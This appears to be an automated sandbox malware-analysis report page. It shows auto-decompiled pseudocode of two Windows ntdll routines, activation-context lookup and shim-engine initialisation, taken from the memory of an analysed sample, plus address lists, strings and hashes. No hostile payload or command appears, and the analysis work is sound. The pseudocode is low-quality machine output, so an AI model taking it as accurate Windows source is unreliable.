                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                                  			E3336D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3344b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E33394B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E333DEF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E3336D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E333DEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E3336A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E333A8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E333A8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x334491e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E33354428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E33398170( &_v36, _t228 + _t254, _t211, 0x1c, E3334B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                                                                                                                                                  0x3336d698
                                                                                                                                                                                  0x3336d6a2
                                                                                                                                                                                  0x3336d6a6
                                                                                                                                                                                  0x3336d6ad
                                                                                                                                                                                  0x3336d6b1
                                                                                                                                                                                  0x3336d6b4
                                                                                                                                                                                  0x3336d6b8
                                                                                                                                                                                  0x3336d6c3
                                                                                                                                                                                  0x3336d6c7
                                                                                                                                                                                  0x3336d6cb
                                                                                                                                                                                  0x3336d90e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b913f
                                                                                                                                                                                  0x333b913f
                                                                                                                                                                                  0x3336d847
                                                                                                                                                                                  0x3336d84b
                                                                                                                                                                                  0x3336d84c
                                                                                                                                                                                  0x3336d84d
                                                                                                                                                                                  0x3336d858
                                                                                                                                                                                  0x3336d858
                                                                                                                                                                                  0x3336d90e
                                                                                                                                                                                  0x3336d6d1
                                                                                                                                                                                  0x3336d6d1
                                                                                                                                                                                  0x3336d6db
                                                                                                                                                                                  0x333b9164
                                                                                                                                                                                  0x333b9164
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9164
                                                                                                                                                                                  0x3336d6e1
                                                                                                                                                                                  0x3336d6ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d6f3
                                                                                                                                                                                  0x3336d8fc
                                                                                                                                                                                  0x3336d701
                                                                                                                                                                                  0x3336d704
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d70a
                                                                                                                                                                                  0x3336d70d
                                                                                                                                                                                  0x3336d922
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9149
                                                                                                                                                                                  0x333b914e
                                                                                                                                                                                  0x333b9153
                                                                                                                                                                                  0x333b9158
                                                                                                                                                                                  0x333b9158
                                                                                                                                                                                  0x333b915a
                                                                                                                                                                                  0x333b915c
                                                                                                                                                                                  0x333b9161
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9161
                                                                                                                                                                                  0x3336d713
                                                                                                                                                                                  0x3336d716
                                                                                                                                                                                  0x3336d936
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b916e
                                                                                                                                                                                  0x333b9173
                                                                                                                                                                                  0x333b9178
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9178
                                                                                                                                                                                  0x3336d71c
                                                                                                                                                                                  0x3336d71f
                                                                                                                                                                                  0x3336d723
                                                                                                                                                                                  0x3336d72f
                                                                                                                                                                                  0x3336d73c
                                                                                                                                                                                  0x3336d745
                                                                                                                                                                                  0x3336d749
                                                                                                                                                                                  0x3336d751
                                                                                                                                                                                  0x3336d759
                                                                                                                                                                                  0x3336d768
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d76e
                                                                                                                                                                                  0x3336d772
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d778
                                                                                                                                                                                  0x3336d77f
                                                                                                                                                                                  0x3336d8f1
                                                                                                                                                                                  0x3336d8f1
                                                                                                                                                                                  0x333b9370
                                                                                                                                                                                  0x333b9370
                                                                                                                                                                                  0x333b937b
                                                                                                                                                                                  0x333b9380
                                                                                                                                                                                  0x333b9383
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9383
                                                                                                                                                                                  0x3336d785
                                                                                                                                                                                  0x3336d790
                                                                                                                                                                                  0x3336d790
                                                                                                                                                                                  0x3336d790
                                                                                                                                                                                  0x3336d79a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d7a0
                                                                                                                                                                                  0x3336d7a3
                                                                                                                                                                                  0x3336d7a7
                                                                                                                                                                                  0x3336d80d
                                                                                                                                                                                  0x3336d80d
                                                                                                                                                                                  0x3336d816
                                                                                                                                                                                  0x3336d81c
                                                                                                                                                                                  0x3336d820
                                                                                                                                                                                  0x3336d822
                                                                                                                                                                                  0x3336d826
                                                                                                                                                                                  0x3336d829
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d830
                                                                                                                                                                                  0x3336d833
                                                                                                                                                                                  0x3336d85d
                                                                                                                                                                                  0x3336d860
                                                                                                                                                                                  0x333b92e0
                                                                                                                                                                                  0x333b92e8
                                                                                                                                                                                  0x3336d941
                                                                                                                                                                                  0x3336d941
                                                                                                                                                                                  0x3336d949
                                                                                                                                                                                  0x3336d94f
                                                                                                                                                                                  0x3336d874
                                                                                                                                                                                  0x3336d874
                                                                                                                                                                                  0x3336d87a
                                                                                                                                                                                  0x3336d884
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d886
                                                                                                                                                                                  0x3336d88b
                                                                                                                                                                                  0x3336d83e
                                                                                                                                                                                  0x3336d840
                                                                                                                                                                                  0x3336d891
                                                                                                                                                                                  0x3336d8a5
                                                                                                                                                                                  0x3336d8ac
                                                                                                                                                                                  0x333b933a
                                                                                                                                                                                  0x3336d8dc
                                                                                                                                                                                  0x3336d8de
                                                                                                                                                                                  0x333b935b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9361
                                                                                                                                                                                  0x3336d8e4
                                                                                                                                                                                  0x3336d8eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9349
                                                                                                                                                                                  0x333b9349
                                                                                                                                                                                  0x333b934d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b934d
                                                                                                                                                                                  0x333b933a
                                                                                                                                                                                  0x3336d8b2
                                                                                                                                                                                  0x3336d8d2
                                                                                                                                                                                  0x3336d8d6
                                                                                                                                                                                  0x3336d8d8
                                                                                                                                                                                  0x3336d8da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d8da
                                                                                                                                                                                  0x3336d842
                                                                                                                                                                                  0x3336d842
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d842
                                                                                                                                                                                  0x3336d955
                                                                                                                                                                                  0x3336d95a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d95a
                                                                                                                                                                                  0x333b92ee
                                                                                                                                                                                  0x333b92f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b92f8
                                                                                                                                                                                  0x333b92fb
                                                                                                                                                                                  0x333b9301
                                                                                                                                                                                  0x333b931f
                                                                                                                                                                                  0x333b9321
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9327
                                                                                                                                                                                  0x333b9327
                                                                                                                                                                                  0x333b932c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b932c
                                                                                                                                                                                  0x333b9306
                                                                                                                                                                                  0x333b9313
                                                                                                                                                                                  0x333b931c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b931c
                                                                                                                                                                                  0x333b9315
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9315
                                                                                                                                                                                  0x333b9308
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9308
                                                                                                                                                                                  0x3336d866
                                                                                                                                                                                  0x3336d869
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d872
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d872
                                                                                                                                                                                  0x3336d835
                                                                                                                                                                                  0x3336d838
                                                                                                                                                                                  0x333b9366
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9366
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d838
                                                                                                                                                                                  0x3336d830
                                                                                                                                                                                  0x3336d7ad
                                                                                                                                                                                  0x333b917f
                                                                                                                                                                                  0x333b917f
                                                                                                                                                                                  0x3336d7b3
                                                                                                                                                                                  0x3336d7b8
                                                                                                                                                                                  0x333b9188
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9194
                                                                                                                                                                                  0x333b91a5
                                                                                                                                                                                  0x333b91ac
                                                                                                                                                                                  0x333b91ae
                                                                                                                                                                                  0x333b91b0
                                                                                                                                                                                  0x333b91b7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b91bd
                                                                                                                                                                                  0x333b91bd
                                                                                                                                                                                  0x333b91c8
                                                                                                                                                                                  0x333b91ca
                                                                                                                                                                                  0x333b91d7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b91e5
                                                                                                                                                                                  0x333b91e6
                                                                                                                                                                                  0x333b91ec
                                                                                                                                                                                  0x333b91f0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b91f2
                                                                                                                                                                                  0x3336d7be
                                                                                                                                                                                  0x3336d7be
                                                                                                                                                                                  0x3336d7c2
                                                                                                                                                                                  0x3336d7c5
                                                                                                                                                                                  0x333b91f7
                                                                                                                                                                                  0x333b91fa
                                                                                                                                                                                  0x333b91fe
                                                                                                                                                                                  0x333b9213
                                                                                                                                                                                  0x333b9216
                                                                                                                                                                                  0x333b921a
                                                                                                                                                                                  0x333b921d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b921f
                                                                                                                                                                                  0x333b9224
                                                                                                                                                                                  0x3336d805
                                                                                                                                                                                  0x3336d807
                                                                                                                                                                                  0x333b9231
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9237
                                                                                                                                                                                  0x333b923d
                                                                                                                                                                                  0x333b9244
                                                                                                                                                                                  0x333b924e
                                                                                                                                                                                  0x333b9254
                                                                                                                                                                                  0x333b925c
                                                                                                                                                                                  0x333b9261
                                                                                                                                                                                  0x333b9261
                                                                                                                                                                                  0x333b925c
                                                                                                                                                                                  0x333b926d
                                                                                                                                                                                  0x333b926f
                                                                                                                                                                                  0x333b9274
                                                                                                                                                                                  0x333b9286
                                                                                                                                                                                  0x333b9299
                                                                                                                                                                                  0x333b929f
                                                                                                                                                                                  0x333b92a1
                                                                                                                                                                                  0x333b92aa
                                                                                                                                                                                  0x333b92ae
                                                                                                                                                                                  0x333b92b0
                                                                                                                                                                                  0x333b92b0
                                                                                                                                                                                  0x333b92ae
                                                                                                                                                                                  0x333b9274
                                                                                                                                                                                  0x333b92b6
                                                                                                                                                                                  0x333b92d9
                                                                                                                                                                                  0x333b92d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b92b6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d807
                                                                                                                                                                                  0x3336d7cb
                                                                                                                                                                                  0x3336d7d9
                                                                                                                                                                                  0x3336d7e0
                                                                                                                                                                                  0x3336d7e7
                                                                                                                                                                                  0x3336d7ee
                                                                                                                                                                                  0x3336d7fb
                                                                                                                                                                                  0x3336d800
                                                                                                                                                                                  0x3336d803
                                                                                                                                                                                  0x3336d803
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d7b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d790
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336d902
                                                                                                                                                                                  0x3336d6fb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 333B9372
                                                                                                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333B9153
                                                                                                                                                                                  • GsHd, xrefs: 3336D794
                                                                                                                                                                                  • Actx , xrefs: 333B9315
                                                                                                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333B9178
                                                                                                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 333B914E, 333B9173
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                  • API String ID: 3446177414-2196497285
                                                                                                                                                                                  • Opcode ID: 62acff79292d84f1be8c14c45c6b0398ca8d0925d05d309a3b68825c3d92aa68
                                                                                                                                                                                  • Instruction ID: a697bef718134c446197cd7c331c84d0f12b73b5a42eb34868a4c3759666a20e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62acff79292d84f1be8c14c45c6b0398ca8d0925d05d309a3b68825c3d92aa68
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6E1C374A043418FEB00CF14C8C4B6AB7F8BF88358F488A6DE995DB695D770E944CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                  			E3334640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x3344b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = L33346C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x334437c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E3334BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E33394B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E333CE692();
					_t85 =  *0x334437c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E3336E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E33346B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E3337E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x334437c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E333CE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x334437c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x33445d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					L33387DF6( *((intOrPtr*)(_t108 + 0xc)));
					E3336D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E33346868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x334437c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x33449208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x33445b24; // 0x2fe2d40
					asm("ror esi, cl");
					 *0x334491e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E33346565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                                                                                                                                                  0x33346415
                                                                                                                                                                                  0x33346422
                                                                                                                                                                                  0x3334642e
                                                                                                                                                                                  0x3334642f
                                                                                                                                                                                  0x33346434
                                                                                                                                                                                  0x3334643a
                                                                                                                                                                                  0x3334643b
                                                                                                                                                                                  0x33346440
                                                                                                                                                                                  0x33346446
                                                                                                                                                                                  0x3334644e
                                                                                                                                                                                  0x33346458
                                                                                                                                                                                  0x33346460
                                                                                                                                                                                  0x33346465
                                                                                                                                                                                  0x3334646c
                                                                                                                                                                                  0x333a9770
                                                                                                                                                                                  0x333a9776
                                                                                                                                                                                  0x333a9779
                                                                                                                                                                                  0x333a97b3
                                                                                                                                                                                  0x333a97b3
                                                                                                                                                                                  0x333a97dd
                                                                                                                                                                                  0x333a97dd
                                                                                                                                                                                  0x333a97e3
                                                                                                                                                                                  0x333a97e3
                                                                                                                                                                                  0x33346542
                                                                                                                                                                                  0x33346542
                                                                                                                                                                                  0x3334654a
                                                                                                                                                                                  0x333a982b
                                                                                                                                                                                  0x333a982b
                                                                                                                                                                                  0x33346557
                                                                                                                                                                                  0x33346558
                                                                                                                                                                                  0x33346559
                                                                                                                                                                                  0x33346564
                                                                                                                                                                                  0x33346564
                                                                                                                                                                                  0x333a977b
                                                                                                                                                                                  0x333a977c
                                                                                                                                                                                  0x333a9781
                                                                                                                                                                                  0x333a9783
                                                                                                                                                                                  0x333a9788
                                                                                                                                                                                  0x333a97a0
                                                                                                                                                                                  0x333a97a0
